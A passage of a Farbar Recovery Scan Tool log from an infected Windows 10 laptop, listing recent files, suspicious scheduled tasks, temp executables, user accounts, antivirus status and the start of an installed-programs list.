2016-04-07 15:05 - 2016-04-07 15:08 - 00270622 _____ C:\TDSSKiller.3.1.0.9_07.04.2016_15.05.40_log.txt
2016-04-07 14:51 - 2016-04-07 14:51 - 00000947 _____ C:\Users\Public\Desktop\Emsisoft Anti-Malware.lnk
2016-04-07 14:51 - 2016-04-07 14:51 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Emsisoft Anti-Malware
2016-04-05 13:10 - 2016-04-08 15:23 - 00000000 ____D C:\virus
2016-03-29 18:40 - 2016-03-29 18:40 - 00001379 _____ C:\Users\RoNiN\Downloads\,DanaInfo=.avjtwyfrijk8Knrrqq-zSw98+Q29udHJvbGxlci5CQkJZX1hENzZfUFZTX1Bvb2xlZF9TdGF0aWMgJFM1LTE- (10).ica
2016-03-29 18:29 - 2016-03-29 18:29 - 00001379 _____ C:\Users\RoNiN\Downloads\,DanaInfo=.avjtwyfrijk8Knrrqq-zSw98+Q29udHJvbGxlci5CQkJZX1hENzZfUFZTX1Bvb2xlZF9TdGF0aWMgJFM1LTE- (9).ica
2016-03-29 18:21 - 2016-03-29 18:21 - 00001379 _____ C:\Users\RoNiN\Downloads\,DanaInfo=.avjtwyfrijk8Knrrqq-zSw98+Q29udHJvbGxlci5CQkJZX1hENzZfUFZTX1Bvb2xlZF9TdGF0aWMgJFM1LTE- (8).ica
2016-03-29 18:20 - 2016-03-29 18:20 - 00001380 _____ C:\Users\RoNiN\Downloads\,DanaInfo=.avjtwyfrijk8Knrrqq-zSw98+Q29udHJvbGxlci5CQkJZX1hENzZfUFZTX1Bvb2xlZF9TdGF0aWMgJFM1LTE- (5).ica
2016-03-29 18:20 - 2016-03-29 18:20 - 00001379 _____ C:\Users\RoNiN\Downloads\,DanaInfo=.avjtwyfrijk8Knrrqq-zSw98+Q29udHJvbGxlci5CQkJZX1hENzZfUFZTX1Bvb2xlZF9TdGF0aWMgJFM1LTE- (7).ica
2016-03-29 18:20 - 2016-03-29 18:20 - 00001379 _____ C:\Users\RoNiN\Downloads\,DanaInfo=.avjtwyfrijk8Knrrqq-zSw98+Q29udHJvbGxlci5CQkJZX1hENzZfUFZTX1Bvb2xlZF9TdGF0aWMgJFM1LTE- (6).ica
2016-03-29 18:12 - 2016-03-29 18:19 - 59554128 _____ (Citrix Systems, Inc.) C:\Users\RoNiN\Downloads\CitrixReceiver4.2.100 (1).exe
2016-03-29 18:11 - 2016-03-29 18:22 - 00734784 _____ (Oracle Corporation) C:\Users\RoNiN\Downloads\JavaSetup8u77.exe
2016-03-29 18:10 - 2016-03-29 18:10 - 02072960 _____ (Pulse Secure, LLC) C:\Users\RoNiN\Downloads\JuniperSetupClientInstaller.exe
2016-03-24 00:01 - 2016-03-24 00:01 - 04622232 _____ (Google) C:\Users\RoNiN\Downloads\chrome_cleanup_tool (1).exe
2016-03-23 23:06 - 2016-03-29 18:45 - 00002282 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-03-23 23:06 - 2016-03-29 18:45 - 00002270 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2016-03-23 23:04 - 2016-03-23 23:05 - 00987728 _____ (Google Inc.) C:\Users\RoNiN\Downloads\ChromeSetup (1).exe
2016-03-23 22:36 - 2016-03-23 22:45 - 04584344 _____ (Google) C:\Users\RoNiN\Downloads\chrome_cleanup_tool.exe
2016-03-23 22:26 - 2016-03-23 22:26 - 00987728 _____ (Google Inc.) C:\Users\RoNiN\Downloads\ChromeSetup.exe
2016-03-23 11:41 - 2016-03-23 11:41 - 00001054 _____ C:\Users\RoNiN\Desktop\mwbytescan2016-03-23.txt
2016-03-23 07:41 - 2016-03-10 14:08 - 00140672 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\is-BFNHB.tmp
2016-03-22 23:30 - 2016-03-22 23:30 - 00000000 ____D C:\ProgramData\Emsisoft
2016-03-22 21:58 - 2016-04-09 16:24 - 00000000 ____D C:\Program Files\Emsisoft Anti-Malware
2016-03-22 21:12 - 2016-03-23 11:46 - 225721384 ____N (Emsisoft Ltd. ) C:\Users\RoNiN\Desktop\EmsisoftAntiMalwareSetup.exe
2016-03-22 21:04 - 2016-03-22 21:04 - 00000020 ___SH C:\Users\postgres\ntuser.ini
2016-03-22 21:04 - 2016-03-22 21:04 - 00000000 _SHDL C:\Users\postgres\My Documents
2016-03-22 21:04 - 2016-03-22 21:04 - 00000000 _SHDL C:\Users\postgres\Documents\My Videos
2016-03-22 21:04 - 2016-03-22 21:04 - 00000000 _SHDL C:\Users\postgres\Documents\My Pictures
2016-03-22 21:04 - 2016-03-22 21:04 - 00000000 _SHDL C:\Users\postgres\Documents\My Music
2016-03-22 21:02 - 2015-10-03 04:51 - 00000000 ____D C:\Users\postgres\AppData\Roaming\Real
2016-03-22 21:02 - 2015-10-03 04:51 - 00000000 ____D C:\Users\postgres\AppData\Roaming\Media Center Programs
2016-03-22 21:02 - 2015-10-03 04:51 - 00000000 ____D C:\Users\postgres\AppData\Local\NVIDIA Corporation
2016-03-22 21:02 - 2015-10-03 04:51 - 00000000 ____D C:\Users\postgres\AppData\Local\NVIDIA
2016-03-22 21:02 - 2015-10-03 04:51 - 00000000 ____D C:\Users\postgres\AppData\Local\Google
2016-03-22 21:01 - 2016-04-05 12:43 - 00000000 ____D C:\Users\postgres
2016-03-22 20:37 - 2016-03-22 20:37 - 00671442 _____ C:\Users\RoNiN\Desktop\mwbytescan2016-03-22.txt
2016-03-22 18:54 - 2016-03-22 18:54 - 00000000 ___HD C:\$WINDOWS.~BT
2016-03-22 08:01 - 2016-04-08 13:17 - 00003650 _____ C:\WINDOWS\System32\Tasks\CreateExplorerShellUnelevatedTask
2016-03-21 23:37 - 2016-03-29 12:30 - 00000000 ____D C:\WINDOWS\Microsoft Antimalware
2016-03-21 23:03 - 2016-03-21 23:03 - 00001066 _____ C:\malwarebytes scan 2016-03-21.txt
2016-03-21 19:35 - 2016-03-21 19:35 - 00000046 _____ C:\Users\RoNiN\AppData\Roaming\WB.CFG
2016-03-21 19:12 - 2016-03-21 10:23 - 00886256 _____ (Microsoft Corporation) C:\Users\RoNiN\Desktop\mssstool64.exe
2016-03-14 21:33 - 2016-03-14 21:33 - 00000000 ____D C:\Users\RoNiN\AppData\Local\Chromium
2016-03-14 18:48 - 2016-03-14 18:48 - 00000000 ____D C:\WINDOWS\system32\del
2016-03-13 21:32 - 2016-03-13 21:32 - 00000188 _____ C:\WINDOWS\rst30.bat
2016-03-13 19:29 - 2016-03-13 19:38 - 00000000 ___HD C:\ProgramData\wrc
2016-03-13 19:26 - 2016-03-13 19:26 - 00631808 _____ C:\WINDOWS\wrc.dat
2016-03-13 19:23 - 2016-03-21 20:44 - 00000000 ____D C:\Users\RoNiN\AppData\Local\Setup Wizard
2016-03-13 18:52 - 2016-03-13 18:52 - 00003052 _____ C:\WINDOWS\System32\Tasks\Pritc
2016-03-13 18:51 - 2016-03-13 18:51 - 00000229 _____ C:\WINDOWS\DXM.REG
2016-03-13 15:11 - 2016-03-13 15:11 - 00003418 _____ C:\WINDOWS\System32\Tasks\Rocfokt
2016-03-13 14:29 - 2016-04-09 14:33 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
2016-03-13 14:29 - 2016-03-13 14:29 - 00000000 ____D C:\ProgramData\Malwarebytes
2016-03-13 14:15 - 2016-03-13 14:27 - 22908888 _____ (Malwarebytes ) C:\Users\RoNiN\Downloads\mbam-setup-2.2.0.1024.exe
2016-03-13 14:04 - 2016-03-13 14:04 - 00000000 ____D C:\Users\RoNiN\AppData\Roaming\MCorp
2016-03-11 19:39 - 2016-03-11 19:39 - 07600640 _____ C:\Users\RoNiN\AppData\Roaming\agent.dat
2016-03-11 19:39 - 2016-03-11 19:39 - 01786944 _____ C:\Users\RoNiN\AppData\Roaming\Silflex.tst
2016-03-11 19:39 - 2016-03-11 19:39 - 00018432 _____ C:\Users\RoNiN\AppData\Roaming\Main.dat
2016-03-11 19:38 - 2016-03-11 19:38 - 00072729 _____ C:\Users\RoNiN\AppData\Roaming\Dripsoling.tst
2016-03-11 19:36 - 2016-03-22 01:44 - 00000000 ____D C:\Users\RoNiN\AppData\Local\app
2016-03-11 19:33 - 2016-03-25 15:00 - 00000000 ____D C:\Users\RoNiN\AppData\LocalLow\Company
2016-03-11 19:33 - 2016-03-11 19:33 - 00003416 _____ C:\WINDOWS\System32\Tasks\Lhsorj
2016-03-11 19:32 - 2016-03-13 14:35 - 00000000 ____D C:\Users\RoNiN\AppData\Local\Tempfolder
2016-03-11 19:32 - 2016-03-11 19:32 - 00127488 _____ C:\Users\RoNiN\AppData\Roaming\Installer.dat
2016-03-11 19:32 - 2016-03-11 19:32 - 00000000 ____D C:\uninst
2016-03-11 19:27 - 2016-03-23 16:05 - 00000000 ____D C:\ProgramData\DataFile
2016-03-11 19:27 - 2016-03-11 19:27 - 00187904 _____ C:\WINDOWS\rsrcs.dll
2016-03-11 19:25 - 2016-04-09 16:22 - 00000368 ____H C:\WINDOWS\Tasks\WMMAWVKOLXONAOYC.job
2016-03-11 19:25 - 2016-04-09 16:22 - 00000356 _____ C:\WINDOWS\Tasks\BJZJKCUBLH1.job
2016-03-11 19:25 - 2016-03-11 19:25 - 00003444 _____ C:\WINDOWS\System32\Tasks\WMMAWVKOLXONAOYC
2016-03-11 19:25 - 2016-03-11 19:25 - 00002928 _____ C:\WINDOWS\System32\Tasks\BJZJKCUBLH1
2016-03-11 19:24 - 2016-03-11 19:24 - 00000000 _____ C:\WINDOWS\SysWOW64\Number of results
2016-03-11 19:18 - 2016-03-11 19:16 - 00000967 _____ C:\WINDOWS\system32\Drivers\etc\hp.bak
2016-03-10 23:17 - 2016-03-10 23:17 - 00000000 ____D C:\Users\RoNiN\AppData\Local\CEF
2016-03-10 14:32 - 2016-03-10 23:19 - 00000000 ____D C:\Users\RoNiN\Downloads\DMBDMB
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-04-09 16:28 - 2015-10-03 04:36 - 00006876 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2016-04-09 16:27 - 2015-07-30 18:42 - 00000000 ____D C:\WINDOWS\AppReadiness
2016-04-09 16:23 - 2011-02-19 00:22 - 00000928 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2016-04-09 16:21 - 2015-07-30 17:52 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2016-04-09 16:20 - 2015-07-10 05:05 - 00524288 ___SH C:\WINDOWS\system32\config\BBI
2016-04-09 16:10 - 2014-05-10 00:37 - 00000934 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-470165136-1162808608-978993673-1001UA.job
2016-04-09 16:10 - 2014-05-10 00:37 - 00000882 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-470165136-1162808608-978993673-1001Core.job
2016-04-09 16:07 - 2014-05-26 01:05 - 00000830 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2016-04-09 16:03 - 2011-02-19 00:22 - 00000932 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2016-04-09 12:44 - 2010-10-17 10:09 - 00000000 ____D C:\Users\RoNiN\Documents\Text Documents
2016-04-09 11:12 - 2010-10-16 20:42 - 00000000 ____D C:\Users\RoNiN\AppData\Roaming\Intuit
2016-04-09 10:39 - 2012-02-07 03:14 - 00001545 _____ C:\ProgramData\Microsoft.SqlServer.Compact.400.32.bc
2016-04-09 10:33 - 2011-02-15 01:43 - 00000000 ____D C:\Program Files (x86)\TurboTax
2016-04-09 01:22 - 2010-10-17 17:13 - 00000000 ____D C:\Program Files (x86)\The GodFather
2016-04-09 00:04 - 2011-02-19 00:22 - 00000000 ____D C:\Program Files (x86)\Google
2016-04-08 23:31 - 2015-07-30 18:42 - 00000000 ___HD C:\Program Files\WindowsApps
2016-04-08 15:54 - 2015-07-30 18:42 - 00000000 ____D C:\WINDOWS\SysWOW64\GroupPolicy
2016-04-08 15:53 - 2009-07-13 23:20 - 00000000 ___HD C:\WINDOWS\system32\GroupPolicy
2016-04-08 13:45 - 2015-07-30 18:42 - 00000000 ____D C:\WINDOWS\system32\NDF
2016-04-07 16:20 - 2011-07-10 23:21 - 00000000 ____D C:\Users\RoNiN\AppData\LocalLow\Yahoo!
2016-04-07 14:52 - 2013-11-10 15:02 - 04126550 _____ C:\WINDOWS\ntbtlog.txt
2016-04-07 14:36 - 2015-07-30 18:42 - 00000000 ___SD C:\WINDOWS\Downloaded Program Files
2016-04-05 12:56 - 2015-10-03 04:40 - 00000000 ____D C:\Users\RoNiN
2016-03-29 18:38 - 2013-12-17 08:09 - 00000000 ____D C:\ProgramData\Oracle
2016-03-29 18:37 - 2015-03-13 11:03 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2016-03-29 18:37 - 2010-10-17 17:05 - 00000000 ____D C:\Program Files (x86)\Java
2016-03-29 18:33 - 2015-09-29 09:12 - 00000000 ____D C:\Users\RoNiN\.oracle_jre_usage
2016-03-29 18:32 - 2015-03-13 11:04 - 00097856 _____ (Oracle Corporation) C:\WINDOWS\SysWOW64\WindowsAccessBridge-32.dll
2016-03-25 15:28 - 2015-07-30 17:50 - 00000000 ____D C:\WINDOWS\Setup
2016-03-25 14:59 - 2015-07-12 09:18 - 00000000 ____D C:\Users\RoNiN\AppData\Roaming\03000200-1436707123-0500-0006-000700080009
2016-03-25 14:59 - 2015-07-12 09:17 - 00000000 ____D C:\Users\RoNiN\AppData\Roaming\03000200-1436707069-0500-0006-000700080009
2016-03-24 00:32 - 2013-07-11 06:09 - 00000000 ____D C:\Users\RoNiN\Update
2016-03-22 23:42 - 2015-07-12 09:38 - 00000000 ____D C:\Users\RoNiN\AppData\Roaming\03000200-1436708320-0500-0006-000700080009
2016-03-22 20:01 - 2015-10-01 18:30 - 00003582 _____ C:\WINDOWS\System32\Tasks\RealPlayerRealUpgradeScheduledTaskS-1-5-21-470165136-1162808608-978993673-1001
2016-03-22 20:01 - 2015-10-01 18:30 - 00003518 _____ C:\WINDOWS\System32\Tasks\RealPlayerRealUpgradeLogonTaskS-1-5-21-470165136-1162808608-978993673-1001
2016-03-22 18:59 - 2015-11-04 19:30 - 00000000 ____D C:\WINDOWS\Panther
2016-03-21 20:42 - 2015-09-27 14:51 - 00000000 ____D C:\Users\RoNiN\AppData\Roaming\foobar2000
2016-03-21 20:41 - 2015-09-27 14:49 - 03875496 _____ (foobar2000.org) C:\Users\RoNiN\Downloads\foobar2000_v1.3.8.exe
2016-03-14 22:36 - 2015-07-30 18:40 - 00000000 ____D C:\WINDOWS\INF
2016-03-14 19:01 - 2013-11-10 15:08 - 00000000 ____D C:\WINDOWS\pss
2016-03-13 19:51 - 2011-12-12 02:14 - 00000008 __RSH C:\ProgramData\ntuser.pol
2016-03-13 19:21 - 2015-02-14 12:26 - 00000000 ____D C:\Users\RoNiN\AppData\Roaming\TeamViewer
2016-03-13 19:21 - 2011-03-24 03:30 - 00000000 ____D C:\Users\RoNiN\AppData\Roaming\Mozilla
2016-03-13 17:24 - 2015-07-30 18:25 - 00000000 ____D C:\WINDOWS\CbsTemp
2016-03-13 14:00 - 2015-09-10 01:42 - 00000000 __RHD C:\Users\Public\AccountPictures
2016-03-13 13:02 - 2016-01-13 09:24 - 00000000 ____D C:\WINDOWS\SysWOW64\NV
2016-03-13 13:02 - 2016-01-13 09:24 - 00000000 ____D C:\WINDOWS\system32\NV
2016-03-11 19:12 - 2015-07-12 12:14 - 00000000 ____D C:\ProgramData\Package Cache
2016-03-10 23:34 - 2015-07-30 17:49 - 00342192 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2016-03-10 23:27 - 2015-07-30 18:42 - 00000000 ____D C:\Program Files\Windows Portable Devices
2016-03-10 23:27 - 2015-07-30 18:42 - 00000000 ____D C:\Program Files\Windows Multimedia Platform
2016-03-10 23:27 - 2015-07-30 18:42 - 00000000 ____D C:\Program Files (x86)\Windows Portable Devices
2016-03-10 23:27 - 2015-07-30 18:42 - 00000000 ____D C:\Program Files (x86)\Windows Multimedia Platform
2016-03-10 23:23 - 2010-10-24 03:29 - 00000000 ____D C:\Users\RoNiN\AppData\Roaming\Azureus
2016-03-10 23:20 - 2010-11-03 00:18 - 00000000 ____D C:\Users\RoNiN\Documents\Vuze Downloads
 
==================== Files in the root of some directories =======
 
2016-03-11 19:39 - 2016-03-11 19:39 - 7600640 _____ () C:\Users\RoNiN\AppData\Roaming\agent.dat
2014-02-13 05:53 - 2014-02-13 05:53 - 0000268 ___RH () C:\Users\RoNiN\AppData\Roaming\Ambient
2014-02-13 05:54 - 2014-02-13 05:54 - 0000268 ___RH () C:\Users\RoNiN\AppData\Roaming\Analog Mono
2014-02-13 05:53 - 2014-02-13 05:53 - 0000268 ___RH () C:\Users\RoNiN\AppData\Roaming\Analog Pad
2015-10-29 09:35 - 2015-10-29 09:35 - 0000093 _____ () C:\Users\RoNiN\AppData\Roaming\ARCompanion.log
2016-03-11 19:38 - 2016-03-11 19:38 - 0072729 _____ () C:\Users\RoNiN\AppData\Roaming\Dripsoling.tst
2015-04-19 08:20 - 2015-04-19 08:20 - 0005872 _____ () C:\Users\RoNiN\AppData\Roaming\GWB6hPAk0e6t
2016-03-11 19:32 - 2016-03-11 19:32 - 0127488 _____ () C:\Users\RoNiN\AppData\Roaming\Installer.dat
2016-03-11 19:39 - 2016-03-11 19:39 - 0018432 _____ () C:\Users\RoNiN\AppData\Roaming\Main.dat
2016-03-11 19:39 - 2016-03-11 19:39 - 1786944 _____ () C:\Users\RoNiN\AppData\Roaming\Silflex.tst
2016-03-21 19:35 - 2016-03-21 19:35 - 0000046 _____ () C:\Users\RoNiN\AppData\Roaming\WB.CFG
2011-03-09 00:31 - 2012-12-28 02:36 - 0004608 _____ () C:\Users\RoNiN\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2011-09-04 17:15 - 2011-09-04 18:54 - 0044224 _____ () C:\Users\RoNiN\AppData\Local\RAContactHistory.xml
2014-01-13 08:41 - 2015-05-10 15:55 - 0007599 _____ () C:\Users\RoNiN\AppData\Local\Resmon.ResmonCfg
2016-03-09 18:03 - 2016-03-09 18:03 - 0002560 _____ () C:\Users\RoNiN\AppData\Local\uninstall.exe
2012-11-05 05:50 - 2012-11-05 05:50 - 0000026 ____H () C:\ProgramData\.811261211181235583101118113995
2010-12-13 23:04 - 2011-03-23 01:59 - 0000083 ___SH () C:\ProgramData\.zreglib
2012-05-27 21:35 - 2012-05-27 21:35 - 0000057 _____ () C:\ProgramData\Ament.ini
2014-02-13 05:53 - 2014-02-13 05:53 - 0000268 ___RH () C:\ProgramData\Analog Sync
2014-02-13 05:54 - 2014-02-13 05:54 - 0000268 ___RH () C:\ProgramData\Animals
2014-02-13 05:53 - 2014-02-13 05:53 - 0000268 ___RH () C:\ProgramData\Applause and Laugher
2010-10-17 21:03 - 2010-10-17 21:03 - 0004998 _____ () C:\ProgramData\bltofzsb.qlf
2015-03-01 21:31 - 2015-03-01 21:31 - 0004939 _____ () C:\ProgramData\flwjycbm.bab
2012-02-07 03:14 - 2016-04-09 10:39 - 0001545 _____ () C:\ProgramData\Microsoft.SqlServer.Compact.400.32.bc
2014-02-13 05:54 - 2014-02-13 05:54 - 0000020 ____H () C:\ProgramData\PKP_DLes.DAT
2014-02-13 05:53 - 2015-06-25 13:12 - 0000020 ____H () C:\ProgramData\PKP_DLet.DAT
2014-02-13 05:53 - 2015-09-27 23:45 - 0000020 ____H () C:\ProgramData\PKP_DLev.DAT
2015-07-12 12:16 - 2015-07-12 12:22 - 0000112 _____ () C:\ProgramData\WceNM3o.dat
 
Files to move or delete:
====================
C:\ProgramData\WceNM3o.dat
C:\Users\RoNiN\autoplaylist.dat
C:\Users\RoNiN\cddbcontrol.dll
C:\Users\RoNiN\cddblink.dll
C:\Users\RoNiN\cddbmusicid.dll
C:\Users\RoNiN\convert.exe
C:\Users\RoNiN\dbghelp.dll
C:\Users\RoNiN\dunzip32.dll
C:\Users\RoNiN\fixrjb.exe
C:\Users\RoNiN\hxaudiodevicehook.dll
C:\Users\RoNiN\ierjplug.dll
C:\Users\RoNiN\keys.dat
C:\Users\RoNiN\mc_enc_h263.dll
C:\Users\RoNiN\mediainfo.dll
C:\Users\RoNiN\mmcdda32.dll
C:\Users\RoNiN\rdsf3260.dll
C:\Users\RoNiN\realcleaner.exe
C:\Users\RoNiN\realconverter.exe
C:\Users\RoNiN\realjbox.exe
C:\Users\RoNiN\realplay.exe
C:\Users\RoNiN\realshare.exe
C:\Users\RoNiN\realtrimmer.exe
C:\Users\RoNiN\rjbres.dll
C:\Users\RoNiN\rjdlg.dll
C:\Users\RoNiN\rjprog.dll
C:\Users\RoNiN\rjwmapln.dll
C:\Users\RoNiN\rndevicedbbuilder.exe
C:\Users\RoNiN\rpau3260.dll
C:\Users\RoNiN\rphelperapp.exe
C:\Users\RoNiN\rpplugprot.dll
C:\Users\RoNiN\rpshell.dll
C:\Users\RoNiN\rpshellextension.dll
C:\Users\RoNiN\rpshellsearch.dll
C:\Users\RoNiN\rpwa3260.dll
C:\Users\RoNiN\strs23.dat
C:\Users\RoNiN\strs26.dat
C:\Users\RoNiN\tnetdtct.dll
C:\Users\RoNiN\tpasdk.dll
C:\Users\RoNiN\tsasdk.dll
C:\Users\RoNiN\wmdmhelper.dll
 
 
Some files in TEMP:
====================
C:\Users\RoNiN\AppData\Local\Temp\392590059.exe
C:\Users\RoNiN\AppData\Local\Temp\523578965.exe
C:\Users\RoNiN\AppData\Local\Temp\ARCompanionForSession1.exe
C:\Users\RoNiN\AppData\Local\Temp\dsHostCheckerSetup.exe
C:\Users\RoNiN\AppData\Local\Temp\Execute2App.exe
C:\Users\RoNiN\AppData\Local\Temp\File_Downloader.exe
C:\Users\RoNiN\AppData\Local\Temp\i4jdel0.exe
C:\Users\RoNiN\AppData\Local\Temp\io1.exe
C:\Users\RoNiN\AppData\Local\Temp\jre-8u73-windows-au.exe
C:\Users\RoNiN\AppData\Local\Temp\JuniperSetupClientInstaller.exe
C:\Users\RoNiN\AppData\Local\Temp\libeay32.dll
C:\Users\RoNiN\AppData\Local\Temp\lowproc.exe
C:\Users\RoNiN\AppData\Local\Temp\msvcp90.dll
C:\Users\RoNiN\AppData\Local\Temp\msvcr120.dll
C:\Users\RoNiN\AppData\Local\Temp\msvcr90.dll
C:\Users\RoNiN\AppData\Local\Temp\sqlite3.dll
C:\Users\RoNiN\AppData\Local\Temp\stubhelper.dll
 
 
==================== Bamital & volsnap =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2016-04-08 10:02
 
==================== End of FRST.txt ============================
 
 
Addition:
Additional scan result of Farbar Recovery Scan Tool (x64) Version:05-03-2016 01
Ran by RoNiN (2016-04-09 16:31:06)
Running from C:\virus
Windows 10 Home (X64) (2015-10-03 12:41:30)
Boot Mode: Normal
==========================================================
 
 
==================== Accounts: =============================
 
Administrator (S-1-5-21-470165136-1162808608-978993673-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-470165136-1162808608-978993673-503 - Limited - Disabled)
Guest (S-1-5-21-470165136-1162808608-978993673-501 - Limited - Disabled)
Mcx1-RONIN-LAPTOP (S-1-5-21-470165136-1162808608-978993673-1013 - Limited - Enabled)
postgres (S-1-5-21-470165136-1162808608-978993673-1005 - Limited - Enabled) => C:\Users\postgres
RoNiN (S-1-5-21-470165136-1162808608-978993673-1001 - Administrator - Enabled) => C:\Users\RoNiN
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Emsisoft Anti-Malware (Enabled - Up to date) {15510D9D-6530-DA29-224F-7BA1BDD1CB58}
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Emsisoft Anti-Malware (Enabled - Up to date) {AE30EC79-430A-D5A7-18FF-40D3C65681E5}
 
==================== Installed Programs ======================
 
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
888pokerNJ (HKLM-x32\...\888pokerNJ) (Version:  - )
abgx360 v1.0.6 (HKLM-x32\...\abgx360) (Version:  - )
AC3Filter (remove only) (HKLM-x32\...\AC3Filter) (Version:  - )
Acrobat.com (HKLM-x32\...\{287ECFA4-719A-2143-A09B-D6A12DE54E40}) (Version: 1.6.65 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 1.5.0.7220 - Adobe Systems Inc.)
Adobe Flash Player 10 ActiveX 64-bit (HKLM\...\Adobe Flash Player ActiveX 64) (Version: 10.2.161.23 - Adobe Systems Incorporated)
Adobe Flash Player 16 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 16.0.0.305 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.02) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.02 - Adobe Systems Incorporated)
Amazon Music (HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\Amazon Amazon Music) (Version: 3.1.0.570 - Amazon Services LLC)
AnswerWorks 5.0 English Runtime (HKLM-x32\...\{DBCC73BA-C69A-4BF5-B4BF-F07501EE7039}) (Version: 5.0.7 - Vantage Software Technologies)
AnyDVD (HKLM-x32\...\AnyDVD) (Version: 6.7.8.0 - SlySoft)
Apple Application Support (HKLM-x32\...\{83CAF0DE-8D3B-4C37-A631-2B8F16EC3031}) (Version: 3.1 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{BDD99690-3541-4619-9D2A-3CDDB3E15F9E}) (Version: 8.0.5.6 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
ArcSoft Magic-i Visual Effects 2 (HKLM-x32\...\{8E90189A-A5D4-4C0E-A908-06C4236F98EE}) (Version: 2.0.10.94 - ArcSoft)
ArcSoft Print Creations - Album Page (HKLM-x32\...\{E6B4117F-AC59-4B13-9274-EB136E8897EE}) (Version:  - ArcSoft)
ArcSoft Print Creations - Brochures & Flyers (HKLM-x32\...\{01A1A019-E1D8-482A-BE17-5E118D17C0A0}) (Version:  - ArcSoft)
ArcSoft Print Creations - Funhouse (HKLM-x32\...\{9591C049-5CAE-4E89-A8D9-191F1899628B}) (Version:  - ArcSoft)
ArcSoft Print Creations - Funhouse II (HKLM-x32\...\{3CE47E6B-AE27-4E40-AC54-329EED96B933}) (Version:  - ArcSoft)
ArcSoft Print Creations - Greeting Card (HKLM-x32\...\{F04F9557-81A9-4293-BC49-2C216FA325A7}) (Version:  - ArcSoft)
ArcSoft Print Creations - Photo Book (HKLM-x32\...\{56589DFE-0C29-4DFE-8E42-887B771ECD23}) (Version:  - ArcSoft)
ArcSoft Print Creations - Photo Calendar (HKLM-x32\...\{CA9ED5E4-1548-485B-A293-417840060158}) (Version:  - ArcSoft)
ArcSoft Print Creations - Photo Prints (HKLM-x32\...\{95F875CC-1B85-43E6-B3E0-13EA04F3D995}) (Version:  - ArcSoft)
ArcSoft Print Creations - Poster Creator (HKLM-x32\...\{5D1C82E7-7EC0-4404-A8AD-36C3B444BC34}) (Version:  - ArcSoft)
ArcSoft Print Creations - Scrapbook (HKLM-x32\...\{B0D83FCD-9D42-43ED-8315-250326AADA02}) (Version:  - ArcSoft)
ArcSoft Print Creations - Slimline Card (HKLM-x32\...\{007B37D9-0C45-4202-834B-DD5FAAE99D63}) (Version:  - ArcSoft)
ArcSoft Print Creations (HKLM-x32\...\{A3324BBB-3A83-40CE-AA8C-759D849B7EA1}) (Version: 3.0.255.487 - ArcSoft)
ArcSoft WebCam Companion 3 (HKLM-x32\...\{25478065-4CB1-448C-80E4-8C4529017EE3}) (Version: 3.0.32.354 - ArcSoft)
Avidemux 2.6 - 64 bits (HKLM-x32\...\Avidemux 2.6 - 64 bits (64-bit)) (Version: 2.6.10.150607 - )
AviSynth 2.5 (HKLM-x32\...\AviSynth) (Version:  - )
Battlelog Web Plugins (HKLM-x32\...\Battlelog Web Plugins) (Version: 2.6.2 - EA Digital Illusions CE AB)
BitTorrent (HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\BitTorrent) (Version: 7.9.2.38398 - BitTorrent Inc.)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
BovadaPoker (HKLM-x32\...\{D7CA2DF8-95CE-4C80-9296-98E21219A1E5}}_is1) (Version:   -  )
